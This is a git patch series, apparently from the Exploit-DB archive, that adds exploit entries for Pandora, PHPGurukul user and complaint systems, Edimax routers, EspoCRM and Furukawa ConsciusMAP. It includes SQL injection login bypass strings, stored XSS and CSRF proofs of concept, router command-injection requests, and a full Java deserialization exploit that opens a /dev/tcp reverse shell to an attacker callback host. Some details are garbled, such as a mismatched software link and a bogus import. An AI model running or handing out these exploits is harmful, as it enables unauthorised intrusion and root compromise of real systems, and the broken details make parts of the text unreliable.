+ + + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM \ No newline at end of file diff --git a/exploits/php/webapps/47898.py b/exploits/php/webapps/47898.py index 4cd329aa0..46246b5c1 100755 --- a/exploits/php/webapps/47898.py +++ b/exploits/php/webapps/47898.py @@ -12,32 +12,32 @@ import requests import sys -if len(sys.argv) !=3D 6: +if len(sys.argv) != 6: print("[+] Usage : ./exploit.py target username password ip port") exit() -target =3D sys.argv[1] -username =3D sys.argv[2] -password =3D sys.argv[3] -ip =3D sys.argv[4] -port =3D int(sys.argv[5]) +target = sys.argv[1] +username = sys.argv[2] +password = sys.argv[3] +ip = sys.argv[4] +port = int(sys.argv[5]) -request =3D requests.session() +request = requests.session() -login_info =3D { +login_info = { "nick": username, "pass": password, "login_button": "Login" } -login_request =3D request.post( - target+"/pandora_console/index.php?login=3D1", +login_request = request.post( + target+"/pandora_console/index.php?login=1", login_info, - verify=3DFalse, - allow_redirects=3DTrue + verify=False, + allow_redirects=True ) -resp =3D login_request.text +resp = login_request.text if "User not found in database" in resp: print("[-] Login Failed") @@ -47,7 +47,7 @@ else: print("[+] Sending crafted graph request ..") -body_request =3D { +body_request = { "date": "0", "time": "0", "period": "0", @@ -65,7 +65,6 @@ body_request =3D { "draw_button": "Draw" } -draw_url =3D target + "/pandora_console/index.php?sec=3Dnetf&sec2=3Doperati= -on/netflow/nf_live_view&pure=3D0" +draw_url = target + "/pandora_console/index.php?sec=netf&sec2=operati=on/netflow/nf_live_view&pure=0" print("[+] Check your netcat ;)") request.post(draw_url, body_request) \ No newline at end of file diff --git a/exploits/php/webapps/48368.txt b/exploits/php/webapps/48368.txt new file mode 100644 index 000000000..457a98a70 --- /dev/null +++ b/exploits/php/webapps/48368.txt @@ -0,0 +1,50 @@ +# Exploit Title: User Management System 2.0 - Persistent Cross-Site Scripting +# Author: Besim ALTINOK +# Vendor Homepage: https://phpgurukul.com/ +# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/ +# Version: v2.0 +# Tested on: Xampp +# Credit: İsmail BOZKURT + +------ Details: + +1- Vulnerable code is here: + +Insert user registration information to the DB without filtering. + +if(isset($_POST['signup'])) +{ +$fname=$_POST['fname']; +$lname=$_POST['lname']; +$email=$_POST['email']; +$password=$_POST['password']; +$contact=$_POST['contact']; +$enc_password=$password; +$msg=mysqli_query($con,"insert into +users(fname,lname,email,password,contactno) +values('$fname','$lname','$email','$enc_password','$contact')"); +if($msg) +{ +echo ""; +} +} + +2- In the admin dashboard: + +Get fullName from DB and print it without any filtering + + + + + + + + + + +4- If we insert value of the "fname" as "script>prompt(1)", we can +perform this attack as "Stored XSS" \ No newline at end of file diff --git a/exploits/php/webapps/48369.txt b/exploits/php/webapps/48369.txt new file mode 100644 index 000000000..5fe1b5d54 --- /dev/null +++ b/exploits/php/webapps/48369.txt @@ -0,0 +1,49 @@ +# Exploit Title: User Management System 2.0 - Authentication Bypass +# Author: Besim ALTINOK +# Vendor Homepage: https://phpgurukul.com/ +# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/ +# Version: v2.0 +# Tested on: Xampp +# Credit: İsmail BOZKURT + + +------ Details: + +1- Vulnerable code is here (admin login: /admin/index.php): + +0) +{ + $extra="manage-users.php"; + $_SESSION['login']=$_POST['username']; + $_SESSION['id']=$num['id']; +echo ""; +exit(); +} +else +{ + $_SESSION['action1']="*Invalid username or password"; + $extra="index.php"; +echo ""; +exit(); +} +} + +2- We can bypass authentication with SQLi: + +Bypass code (user and admin login panel): + +Username: pentester' or'1'=1# +Password : pentester' or'1'=1# + +Finally: There is a lot of SQLi input in this project. Like, login, +registration, forgot password ... \ No newline at end of file diff --git a/exploits/php/webapps/48370.txt b/exploits/php/webapps/48370.txt new file mode 100644 index 000000000..7f1ad6b7c --- /dev/null +++ b/exploits/php/webapps/48370.txt @@ -0,0 +1,42 @@ +# Exploit Title: Complaint Management System 4.2 - Persistent Cross-Site Scripting +# Author: Besim ALTINOK +# Vendor Homepage: https://phpgurukul.com/ +# Software Link: https://phpgurukul.com/complaint-management-sytem/ +# Version: v4.2 +# Tested on: Xampp +# Credit: İsmail BOZKURT + +------ Details: + +1- Vulnerable code is here: http://localhost/cms/users/registration.php +2- Vulnerable code: + +Insert user registration information to the DB without filtering. + +if(isset($_POST['submit'])) +{ +$fullname=$_POST['fullname']; +$email=$_POST['email']; +$password=md5($_POST['password']); +$contactno=$_POST['contactno']; +$status=1; +$query=mysqli_query($con,"insert into +users(fullName,userEmail,password,contactNo,status) +values('$fullname','$email','$password','$contactno','$status')"); +$msg="Registration successfull. Now You can login !"; +} +?> + +3- In the admin dashboard: + +Get fullName from DB and print it without any filtering + + +'s profile + + +4- If we insert "fullName" as "script>prompt(2)", we can perform +this attack as "Stored XSS" + +5- Picture in the Attachemnt +--------------------------------------------------- \ No newline at end of file diff --git a/exploits/php/webapps/48371.txt b/exploits/php/webapps/48371.txt new file mode 100644 index 000000000..681c6b849 --- /dev/null +++ b/exploits/php/webapps/48371.txt @@ -0,0 +1,40 @@ +# Exploit Title: Complaint Management System 4.2 - Authentication Bypass +# Author: Besim ALTINOK +# Vendor Homepage: https://phpgurukul.com/ +# Software Link: https://phpgurukul.com/complaint-management-sytem/ +# Version: v4.2 +# Tested on: Xampp +# Credit: İsmail BOZKURT + +------ Details: + +1- Vulnerable code is here: + +if(isset($_POST['submit'])) +{ +$username=$_POST['username']; +$password=md5($_POST['password']); +$ret=mysqli_query($con,"SELECT * FROM admin WHERE +username='$username' and password='$password'"); +$num=mysqli_fetch_array($ret); +if($num>0) +{ +$extra="change-password.php";// +$_SESSION['alogin']=$_POST['username']; +$_SESSION['id']=$num['id']; +$host=$_SERVER['HTTP_HOST']; +$uri=rtrim(dirname($_SERVER['PHP_SELF']),'/\\'); +header("location:http://$host$uri/$extra"); +exit(); +} + +2- We can bypass authentication with SQLi: + +Bypass code (admin login panel): + +Username: pentester' or'1'=1# +Password : pentester' or'1'=1# + +Finally: There is a lot of SQLi input in this project. Like, login, +registration, forgot password ... +----------------------------------- \ No newline at end of file diff --git a/exploits/php/webapps/48372.txt b/exploits/php/webapps/48372.txt new file mode 100644 index 000000000..61f2dda41 --- /dev/null +++ b/exploits/php/webapps/48372.txt @@ -0,0 +1,29 @@ +# Exploit Title: Complaint Management System 4.2 - Cross-Site Request Forgery (Delete User) +# Author: Besim ALTINOK +# Vendor Homepage: https://phpgurukul.com/ +# Software Link: https://phpgurukul.com/complaint-management-sytem/ +# Version: v4.2 +# Tested on: Xampp +# Credit: İsmail BOZKURT +************************************************* +Detail: + +You can perform CSRF Attack for all the functions. + +---------------------------------------------- + +CSRF PoC for Delete User +---------------------------------------------- +This request performs over the GET request with uid. +------------------------------------------------------------------------ + + + +
+ + + + +
+ + \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index e715555db..5b809e378 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -42396,6 +42396,7 @@ id,file,description,date,author,type,platform,port 47893,exploits/hardware/webapps/47893.js,"Sony Playstation 4 (PS4) < 6.72 - WebKit Code Execution (PoC)",2019-12-31,"TJ Corley",webapps,hardware, 47895,exploits/java/webapps/47895.py,"Oracle Weblogic 10.3.6.0.0 - Remote Command Execution",2020-01-09,james,webapps,java, 47898,exploits/php/webapps/47898.py,"Pandora 7.0NG - Remote Code Execution",2020-01-10,Askar,webapps,php, +48368,exploits/php/webapps/48368.txt,"User Management System 2.0 - Persistent Cross-Site Scripting",2020-04-23,Besim,webapps,php, 47899,exploits/php/webapps/47899.py,"PixelStor 5000 K:4.0.1580-20150629 - Remote Code Execution",2020-01-10,.:UND3R:.,webapps,php, 47900,exploits/linux/webapps/47900.txt,"ASTPP 4.0.1 VoIP Billing - Database Backup Download",2020-01-10,"Fabien AUNAY",webapps,linux, 47901,exploits/multiple/webapps/47901.sh,"Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution (PoC)",2020-01-11,"Project Zero India",webapps,multiple, @@ -42604,3 +42605,9 @@ id,file,description,date,author,type,platform,port 48365,exploits/hardware/webapps/48365.txt,"Edimax EW-7438RPn - Information Disclosure (WiFi Password)",2020-04-22,Besim,webapps,hardware, 48366,exploits/hardware/webapps/48366.txt,"Edimax EW-7438RPn - Cross-Site Request Forgery (MAC Filtering)",2020-04-22,Besim,webapps,hardware, 48367,exploits/linux/webapps/48367.txt,"Mahara 19.10.2 CMS - Persistent Cross-Site Scripting",2020-04-22,Vulnerability-Lab,webapps,linux, +48369,exploits/php/webapps/48369.txt,"User Management System 2.0 - Authentication Bypass",2020-04-23,Besim,webapps,php, +48370,exploits/php/webapps/48370.txt,"Complaint Management System 4.2 - Persistent Cross-Site Scripting",2020-04-23,Besim,webapps,php, +48371,exploits/php/webapps/48371.txt,"Complaint Management System 4.2 - Authentication Bypass",2020-04-23,Besim,webapps,php, +48372,exploits/php/webapps/48372.txt,"Complaint Management System 4.2 - Cross-Site Request Forgery (Delete User)",2020-04-23,Besim,webapps,php, +48373,exploits/cgi/webapps/48373.rb,"Zen Load Balancer 3.10.1 - Directory Traversal (Metasploit)",2020-04-23,"Dhiraj Mishra",webapps,cgi, +48375,exploits/ios/webapps/48375.txt,"Sky File 2.1.0 iOS - Directory Traversal",2020-04-23,Vulnerability-Lab,webapps,ios, From 7b87f30fbc6b26b55e0841b8129656ae17402c9f Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 25 Apr 2020 05:01:51 +0000 Subject: [PATCH 18/18] DB: 2020-04-25 5 changes to exploits/shellcodes Popcorn Time 6.2 - 'Update service' Unquoted Service Path EspoCRM 5.8.5 - Privilege Escalation Edimax EW-7438RPn 1.13 - Remote Code Execution Furukawa Electric ConsciusMAP 2.8.1 - Remote Code Execution Linux/x64 - Password Protected Bindshell + Null-free Shellcode (272 Bytes) --- exploits/hardware/webapps/48377.txt | 75 ++++++ exploits/java/webapps/48380.txt | 338 ++++++++++++++++++++++++++++ exploits/multiple/webapps/48376.txt | 40 ++++ exploits/windows/local/48378.txt | 37 +++ files_exploits.csv | 4 + files_shellcodes.csv | 1 + shellcodes/linux/48379.c | 194 ++++++++++++++++ 7 files changed, 689 insertions(+) create mode 100644 exploits/hardware/webapps/48377.txt create mode 100644 exploits/java/webapps/48380.txt create mode 100644 exploits/multiple/webapps/48376.txt create mode 100644 exploits/windows/local/48378.txt create mode 100644 shellcodes/linux/48379.c diff --git a/exploits/hardware/webapps/48377.txt b/exploits/hardware/webapps/48377.txt new file mode 100644 index 000000000..6d6bf69e5 --- /dev/null +++ b/exploits/hardware/webapps/48377.txt @@ -0,0 +1,75 @@ +# Exploit Title: Edimax EW-7438RPn 1.13 - Remote Code Execution +# Date: 2020-04-23 +# Exploit Author: Besim ALTINOK +# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/ +# Version:1.13 +# Tested on: Edimax EW-7438RPn 1.13 Version + +------ + +NOTE: This device configurated with root permissions. So you can run the +command as root + +Here is the detail(s) of the RCE(s) + +1- Content of the mp.asp file + +
+   +   +   +
+ +RCE Detail: +------------------------------- + +POST /goform/mp HTTP/1.1 +Host: 192.168.2.2 +User-Agent: Mozilla/5.0 ********************* +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-GB,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 25 +DNT: 1 +Authorization: Basic YWRtaW46MTIzNA== +Connection: close +Cookie: language=1 +Upgrade-Insecure-Requests: 1 + +command=||busybox+ls&getID= + +------------------------------- + +2- Content of the syscmd.asp + +
+ +This page can be used to run target system command. +
+ + + + + +RCE Detail: +------------------------------- + +POST /goform/formSysCmd HTTP/1.1 +Host: 192.168.2.2 +User-Agent: Mozilla/5.0 ********************* +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-GB,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 11 +DNT: 1 +Authorization: Basic YWRtaW46MTIzNA== +Connection: close +Cookie: language=1 +Upgrade-Insecure-Requests: 1 + +sysCmd="command to here" \ No newline at end of file diff --git a/exploits/java/webapps/48380.txt b/exploits/java/webapps/48380.txt new file mode 100644 index 000000000..6bc0a0374 --- /dev/null +++ b/exploits/java/webapps/48380.txt @@ -0,0 +1,338 @@ +# Exploit Title: Furukawa Electric ConsciusMAP 2.8.1 - Remote Code Execution +# Date: 2020-04-24 +# Vendor Homepage: https://www.tecnoredsa.com.ar +# Exploit Authors: LiquidWorm +# Software Link: https://dl.getpopcorntime.is/PopcornTime-latest.exe +# Version: 2.8.1 +# CVE : N/A + +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +# +# +# Furukawa Electric ConsciusMAP 2.8.1 Java Deserialization Remote Code Execution +# +# +# Vendor: Furukawa Electric Co., Ltd. | Tecnored SA +# Product web page: https://www.furukawa.co.jp | https://www.tecnoredsa.com.ar +# Affected version: APROS Evolution | 2.8.1 +# FURUKAWA | 2.7.10 +# ConsciusMAP | 2.6.4 +# | 2.3.1 +# | 2.1.49 +# | 2.1.36 +# | 2.1.31 +# | 2.1.18 +# | 2.1.16 +# | 2.1.15 +# | 2.1.1 +# | 2.0.1174 +# | 1.8 +# | 1.4.70 +# +# Summary: Apros Evoluation / Furukawa / ConsciusMap is the Tecnored +# provisioning system for FTTH networks. Complete administration of +# your entire external FTTH network plant, including from the ONUs +# installed in each end customer, to the wiring and junction boxes. +# Unify all the management of your FTTH network on a single platform. +# Unify all your data, whether from customers, your network, or the +# external plant in one place. APROS FTTH allows you to manage your +# entire FTTH network in a simple and globalized way with just one +# click, without being a network expert. Includes services such as: +# bandwidth limitation, Turbo Internet for time plans, BURST Internet, +# QinQ for companies, and many more. General consumption graphics and +# per customer in real time. Captive Portal for cutting or suspension +# of the service. +# +# Desc: The FTTH provisioning solution suffers from an unauthenticated +# remote code execution vulnerability due to an unsafe deserialization +# of Java objects (ViewState) triggered via the 'javax.faces.ViewState' +# HTTP POST parameter. The deserialization can cause the vulnerable JSF +# web application to execute arbitrary Java functions, malicious Java +# bytecode, and system shell commands with root privileges. +# +# =================================================================== +# $ ./furukawa.py 172.16.0.1:8080 172.168.0.200 4444 +# [*] Setting up valid URL path +# [*] Starting callback listener child thread +# [*] Starting handler on port 4444 +# [*] Sending serialized object +# [*] Connection from 172.16.0.1:48446 +# [*] You got shell! +# tomcat7@zslab:/var/lib/tomcat7$ id +# uid=114(tomcat7) gid=124(tomcat7) grupos=124(tomcat7),1003(furukawa) +# tomcat7@zslab:/var/lib/tomcat7$ sudo su +# id +# uid=0(root) gid=0(root) grupos=0(root) +# exit +# tomcat7@zslab:/var/lib/tomcat7$ exit +# *** Connection closed by remote host *** +# =================================================================== +# +# Tested on: Apache Tomcat/7.0.68 +# Apache Tomcat/7.0.52 +# Apache MyFaces/2.2.1 +# Apache MyFaces/2.1.17 +# Apache MyFaces/2.0.10 +# GNU/Linux 4.4.0-173 +# GNU/Linux 4.4.0-137 +# GNU/Linux 4.4.0-101 +# GNU/Linux 4.4.0-83 +# GNU/Linux 3.15.0 +# GNU/Linux 3.13.0-32 +# PrimeFaces/4.0.RC1 +# Apache-Coyote/1.1 +# ACC Library 3.1 +# Ubuntu 16.04.2 +# Ubuntu 14.04.2 +# Java/1.8.0_242 +# Java/1.8.0_181 +# Java/1.8.0_131 +# Java/1.7.0_79 +# MySQL 5.7.29 +# MySQL 5.7.18 +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# Macedonian Information Security Research and Development Laboratory +# Zero Science Lab - https://www.zeroscience.mk - @zeroscience +# +# +# Advisory ID: ZSL-2020-5565 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5565.php +# +# CVE ID: CVE-2020-12133 +# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-12133 +# +# +# 24.02.2020 +# + +import os############# +import sys############ +import gzip#######o### +import zlib########### +import socket######### +import base64######### +import urllib######### +import requests####### +import telnetlib###### +import threading###### +import subprocess##### + +from io import BytesIO +from time import sleep +from flash import blic + +class Optics: + + def __init__(self): + self.callback = None# + self.headers = None## + self.payload = None## + self.target = None### + self.lport = None#### + self.path = None##### + self.cmd = None###### + + def allears(self): + telnetus = telnetlib.Telnet() + print("[*] Starting handler on port {}".format(self.lport)) + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.bind(("0.0.0.0", self.lport)) + while True: + try: + s.settimeout(8) + s.listen(1) + conn, addr = s.accept() + print("[*] Connection from {}:{}".format(addr[0], addr[1])) + telnetus.sock = conn + except socket.timeout as p: + print("[!] Probably not vulnerable... ({poraka})".format(poraka=p)) + print("[+] Check your port mappings.") + s.close() + exit(0) + break + + print("[*] You got shell!") + + # + # UnicodeDecodeError dirty fix: + # /usr/lib/python3.6/telnetlib.py + # Change from 'ascii' to 'utf-8' (Lines: 553 and 556) + # + + telnetus.interact() + conn.close() + + def thricer(self): + print("[*] Starting callback listener child thread") + konac = threading.Thread(name="ZSL", target=self.allears) + konac.start() + sleep(1) + self.gadget() + + def gadget(self): + self.cmd = "/bin/bash -c /bin/bash${IFS}-i>&/dev/tcp/" + self.cmd += self.callback + self.cmd += "/" + self.cmd += str(self.lport) + self.cmd += "<&1" + + payload = b"\xAC\xED\x00\x05\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C" + payload += b"\x2E\x48\x61\x73\x68\x53\x65\x74\xBA\x44\x85\x95\x96\xB8\xB7\x34\x03" + payload += b"\x00\x00\x78\x70\x77\x0C\x00\x00\x00\x02\x3F\x40\x00\x00\x00\x00\x00" + payload += b"\x01\x73\x72\x00\x34\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63" + payload += b"\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E" + payload += b"\x73\x2E\x6B\x65\x79\x76\x61\x6C\x75\x65\x2E\x54\x69\x65\x64\x4D\x61" + payload += b"\x70\x45\x6E\x74\x72\x79\x8A\xAD\xD2\x9B\x39\xC1\x1F\xDB\x02\x00\x02" + payload += b"\x4C\x00\x03\x6B\x65\x79\x74\x00\x12\x4C\x6A\x61\x76\x61\x2F\x6C\x61" + payload += b"\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x4C\x00\x03\x6D\x61\x70\x74" + payload += b"\x00\x0F\x4C\x6A\x61\x76\x61\x2F\x75\x74\x69\x6C\x2F\x4D\x61\x70\x3B" + payload += b"\x78\x70\x74\x00\x26\x68\x74\x74\x70\x73\x3A\x2F\x2F\x67\x69\x74\x68" + payload += b"\x75\x62\x2E\x63\x6F\x6D\x2F\x6A\x6F\x61\x6F\x6D\x61\x74\x6F\x73\x66" + payload += b"\x2F\x6A\x65\x78\x62\x6F\x73\x73\x20\x73\x72\x00\x2A\x6F\x72\x67\x2E" + payload += b"\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F" + payload += b"\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x6D\x61\x70\x2E\x4C\x61\x7A" + payload += b"\x79\x4D\x61\x70\x6E\xE5\x94\x82\x9E\x79\x10\x94\x03\x00\x01\x4C\x00" + payload += b"\x07\x66\x61\x63\x74\x6F\x72\x79\x74\x00\x2C\x4C\x6F\x72\x67\x2F\x61" + payload += b"\x70\x61\x63\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F\x63\x6F\x6C" + payload += b"\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2F\x54\x72\x61\x6E\x73\x66\x6F\x72" + payload += b"\x6D\x65\x72\x3B\x78\x70\x73\x72\x00\x3A\x6F\x72\x67\x2E\x61\x70\x61" + payload += b"\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65" + payload += b"\x63\x74\x69\x6F\x6E\x73\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E\x43" + payload += b"\x68\x61\x69\x6E\x65\x64\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72" + payload += b"\x30\xC7\x97\xEC\x28\x7A\x97\x04\x02\x00\x01\x5B\x00\x0D\x69\x54\x72" + payload += b"\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x73\x74\x00\x2D\x5B\x4C\x6F\x72" + payload += b"\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F" + payload += b"\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2F\x54\x72\x61\x6E\x73" + payload += b"\x66\x6F\x72\x6D\x65\x72\x3B\x78\x70\x75\x72\x00\x2D\x5B\x4C\x6F\x72" + payload += b"\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E" + payload += b"\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x54\x72\x61\x6E\x73" + payload += b"\x66\x6F\x72\x6D\x65\x72\x3B\xBD\x56\x2A\xF1\xD8\x34\x18\x99\x02\x00" + payload += b"\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3B\x6F\x72\x67\x2E\x61\x70" + payload += b"\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C" + payload += b"\x65\x63\x74\x69\x6F\x6E\x73\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E" + payload += b"\x43\x6F\x6E\x73\x74\x61\x6E\x74\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D" + payload += b"\x65\x72\x58\x76\x90\x11\x41\x02\xB1\x94\x02\x00\x01\x4C\x00\x09\x69" + payload += b"\x43\x6F\x6E\x73\x74\x61\x6E\x74\x71\x00\x7E\x00\x03\x78\x70\x76\x72" + payload += b"\x00\x11\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x52\x75\x6E\x74\x69" + payload += b"\x6D\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72" + payload += b"\x00\x3A\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D" + payload += b"\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x66" + payload += b"\x75\x6E\x63\x74\x6F\x72\x73\x2E\x49\x6E\x76\x6F\x6B\x65\x72\x54\x72" + payload += b"\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x87\xE8\xFF\x6B\x7B\x7C\xCE\x38" + payload += b"\x02\x00\x03\x5B\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5B\x4C\x6A" + payload += b"\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x4C" + payload += b"\x00\x0B\x69\x4D\x65\x74\x68\x6F\x64\x4E\x61\x6D\x65\x74\x00\x12\x4C" + payload += b"\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72\x69\x6E\x67\x3B" + payload += b"\x5B\x00\x0B\x69\x50\x61\x72\x61\x6D\x54\x79\x70\x65\x73\x74\x00\x12" + payload += b"\x5B\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x43\x6C\x61\x73\x73" + payload += b"\x3B\x78\x70\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E" + payload += b"\x67\x2E\x4F\x62\x6A\x65\x63\x74\x3B\x90\xCE\x58\x9F\x10\x73\x29\x6C" + payload += b"\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0A\x67\x65\x74\x52\x75" + payload += b"\x6E\x74\x69\x6D\x65\x75\x72\x00\x12\x5B\x4C\x6A\x61\x76\x61\x2E\x6C" + payload += b"\x61\x6E\x67\x2E\x43\x6C\x61\x73\x73\x3B\xAB\x16\xD7\xAE\xCB\xCD\x5A" + payload += b"\x99\x02\x00\x00\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4D" + payload += b"\x65\x74\x68\x6F\x64\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x02\x76\x72" + payload += b"\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E" + payload += b"\x67\xA0\xF0\xA4\x38\x7A\x3B\xB3\x42\x02\x00\x00\x78\x70\x76\x71\x00" + payload += b"\x7E\x00\x1B\x73\x71\x00\x7E\x00\x13\x75\x71\x00\x7E\x00\x18\x00\x00" + payload += b"\x00\x02\x70\x75\x71\x00\x7E\x00\x18\x00\x00\x00\x00\x74\x00\x06\x69" + payload += b"\x6E\x76\x6F\x6B\x65\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x02\x76\x72" + payload += b"\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4F\x62\x6A\x65\x63" + payload += b"\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00" + payload += b"\x7E\x00\x18\x73\x71\x00\x7E\x00\x13\x75\x72\x00\x13\x5B\x4C\x6A\x61" + payload += b"\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E\x67\x3B\xAD\xD2" + payload += b"\x56\xE7\xE9\x1D\x7B\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00" + payload += (bytes(chr(len(self.cmd)), "utf-8"))##################################" + payload += (bytes(self.cmd, "utf-8"))############################################" + payload += b"\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x01" + payload += b"\x71\x00\x7E\x00\x20\x73\x71\x00\x7E\x00\x0F\x73\x72\x00\x11\x6A\x61" + payload += b"\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x49\x6E\x74\x65\x67\x65\x72\x12\xE2" + payload += b"\xA0\xA4\xF7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6C\x75\x65" + payload += b"\x78\x72\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4E\x75\x6D" + payload += b"\x62\x65\x72\x86\xAC\x95\x1D\x0B\x94\xE0\x8B\x02\x00\x00\x78\x70\x00" + payload += b"\x00\x00\x01\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E" + payload += b"\x48\x61\x73\x68\x4D\x61\x70\x05\x07\xDA\xC1\xC3\x16\x60\xD1\x03\x00" + payload += b"\x02\x46\x00\x0A\x6C\x6F\x61\x64\x46\x61\x63\x74\x6F\x72\x49\x00\x09" + payload += b"\x74\x68\x72\x65\x73\x68\x6F\x6C\x64\x78\x70\x3F\x40\x00\x00\x00\x00" + payload += b"\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x78"#######" + + jbits = BytesIO() + with gzip.GzipFile(fileobj=jbits, mode="wb") as f: + f.write(payload) + serialize = base64.b64encode(jbits.getvalue()) + print("[*] Sending serialized object") + + self.headers = { + "Accept" : "text/html,application/xhtml+xml,application/xml;q=1.pwn", + "Content-Type" : "application/x-www-form-urlencoded", + "User-Agent" : "ISP-Eye/2.51", + "Connection" : "keep-alive"} + + self.paramz={"javax.faces.ViewState" : serialize} + #sleep(1) + r = requests.post(self.target + self.path, headers=self.headers, data=self.paramz) + + def par(self): + if len(sys.argv) != 4: + self.usage() + else: + self.target = sys.argv[1] + self.callback = sys.argv[2] + self.lport = int(sys.argv[3]) + if not "http" in self.target: + self.target = "http://{}".format(self.target) + + def check(self): + print("[*] Setting up valid URL path") + try: + r = requests.get(self.target) + app = r.text + if not "FURUKAWA" in app and not "APROS" in app: + print("[!] App not detected.") + exit(0) + if "FURUKAWA" in app: + self.path = "/FURUKAWA/" + elif "APROS" in app: + self.path = "/APROS/" + else: + exit(-1337) + except Exception as p: + print("[!] Somethingz wrong: \n--\n{poraka}".format(poraka=p)) + exit(0) + + def framed(self): + naslov = """ + o===--------------------------------------===o + | | + | Furukawa Electric / Tecnored | + | APROS Evolution | FURUKAWA | ConsciusMAP | + | Fiber-To-The-Home (FTTH) | + | | + | Java Deserialization Remote Code Execution | + | ZSL-2020-5565 | + | | + o===--------------------------------------===o + || + || + (\__/)|| + (•ㅅ•)|| + /   づ| + """ + print(naslov) + + def usage(self): + self.framed() + print("Usage: ./furukawa.py ") + print("Example: ./furukawa.py 172.16.0.1:8080 172.16.0.200 4444\n") + exit(0) + + def main(self): + self.par()########() + self.check()######() + self.thricer()####() + +if __name__ == '__main__': + Optics().main() \ No newline at end of file diff --git a/exploits/multiple/webapps/48376.txt b/exploits/multiple/webapps/48376.txt new file mode 100644 index 000000000..af82da422 --- /dev/null +++ b/exploits/multiple/webapps/48376.txt @@ -0,0 +1,40 @@ +# Exploit Title: EspoCRM 5.8.5 - Privilege Escalation +# Author: Besim ALTINOK +# Vendor Homepage: https://www.espocrm.com +# Software Link: https://www.espocrm.com/downloads/EspoCRM-5.8.5.zip +# Version: v5.8.5 +# Tested on: Xampp +# Credit: İsmail BOZKURT + +------------- + +Details: +-------------------------------------------- + +1- When we sent a request to the /api/v1/App/user, we can see user details +--- +First Request: +--------------------------- +GET /api/v1/App/user HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 ************************* +Authorization: Basic ************************************* 